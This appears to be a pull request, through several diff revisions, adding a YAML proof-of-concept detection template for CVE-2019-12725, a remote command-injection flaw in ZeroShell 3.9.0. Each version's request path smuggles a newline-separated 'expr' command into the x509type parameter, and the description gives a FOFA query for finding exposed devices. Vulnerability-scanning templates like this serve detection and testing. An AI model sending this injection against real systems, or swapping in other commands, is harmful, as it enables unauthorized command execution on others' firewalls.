### PR TITLE
add zeroshell-firewall-rce

### DIFF
--- a/pocs/zeroshell-firewall-rce.yml
+++ b/pocs/zeroshell-firewall-rce.yml
@@ -5,10 +5,12 @@ set:
 rules:
   - method: GET
     path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aexpr%20{{r1}}%20-%20{{r2}}%0A%27
+    follow_redirects: false
     expression: |
         response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
+        
 detail:
-    author: YekkoY
-    description: "ZeroShell 3.9.0-远程命令执行漏洞-CVE-2019-12725"
-    links:
-        - http://wiki.xypbk.com/IOT%E5%AE%89%E5%85%A8/ZeroShell/ZeroShell%203.9.0%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2019-12725.md?btwaf=51546333
+  author: YekkoY
+  description: "ZeroShell 3.9.0-远程命令执行漏洞-CVE-2019-12725"
+  links:
+    - http://wiki.xypbk.com/IOT%E5%AE%89%E5%85%A8/ZeroShell/ZeroShell%203.9.0%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2019-12725.md?btwaf=51546333

--- a/pocs/zeroshell-firewall-rce.yml
+++ b/pocs/zeroshell-firewall-rce.yml
@@ -4,7 +4,7 @@ set:
  r2: randomInt(800000000, 1000000000)
 rules:
     - method: GET
-      path: "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0aexpr%20{{r1}}%20%2b%20{{r2}}%0a'"
+      path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0aexpr%20{{r1}}%20%2b%20{{r2}}%0a%27
       expression: >
         response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
 detail:

--- a/pocs/zeroshell-firewall-rce.yml
+++ b/pocs/zeroshell-firewall-rce.yml
@@ -4,9 +4,9 @@ set:
   r2: randomInt(800000000, 1000000000)
 rules:
   - method: GET
-    path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0aexpr%20{{r1}}%20%2b%20{{r2}}%0a%27
+    path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aexpr%20{{r1}}%20-%20{{r2}}%0A%27
     expression: |
-        response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
+        response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
 detail:
     author: YekkoY
     description: "ZeroShell 3.9.0-远程命令执行漏洞-CVE-2019-12725"

--- a/pocs/zeroshell-firewall-rce.yml
+++ b/pocs/zeroshell-firewall-rce.yml
@@ -8,7 +8,7 @@ rules:
     follow_redirects: false
     expression: |
         response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
-        
+
 detail:
   author: YekkoY
   description: "ZeroShell 3.9.0-远程命令执行漏洞-CVE-2019-12725"

--- a/pocs/zeroshell-firewall-rce.yml
+++ b/pocs/zeroshell-firewall-rce.yml
@@ -1,11 +1,11 @@
 name: poc-yaml-zeroshell-firewall-rce
 set:
- r1: randomInt(800000000, 1000000000)
- r2: randomInt(800000000, 1000000000)
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
 rules:
-    - method: GET
-      path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0aexpr%20{{r1}}%20%2b%20{{r2}}%0a%27
-      expression: >
+  - method: GET
+    path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0aexpr%20{{r1}}%20%2b%20{{r2}}%0a%27
+    expression: |
         response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
 detail:
     author: YekkoY

--- a/pocs/zeroshell-firewall-rce.yml
+++ b/pocs/zeroshell-firewall-rce.yml
@@ -1,0 +1,14 @@
+name: poc-yaml-zeroshell-firewall-rce
+set:
+ r1: randomInt(800000000, 1000000000)
+ r2: randomInt(800000000, 1000000000)
+rules:
+    - method: GET
+      path: "/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0aexpr%20{{r1}}%20%2b%20{{r2}}%0a'"
+      expression: >
+        response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
+detail:
+    author: YekkoY
+    description: "ZeroShell 3.9.0-远程命令执行漏洞-CVE-2019-12725"
+    links:
+        - http://wiki.xypbk.com/IOT%E5%AE%89%E5%85%A8/ZeroShell/ZeroShell%203.9.0%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2019-12725.md?btwaf=51546333


### PR DESCRIPTION
ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725


## 本 poc 是检测什么漏洞的
ZeroShell 3.9.0 存在命令执行漏洞，/cgi-bin/kerbynet 页面，x509type 参数过滤不严格，导致攻击者可执行任意命令

## 测试环境
FOFA:app="Zeroshell-防火墙"
## 备注
![image](https://user-images.githubusercontent.com/76224118/118471550-75f66400-b73a-11eb-8096-dbe1f51ebdd1.png)
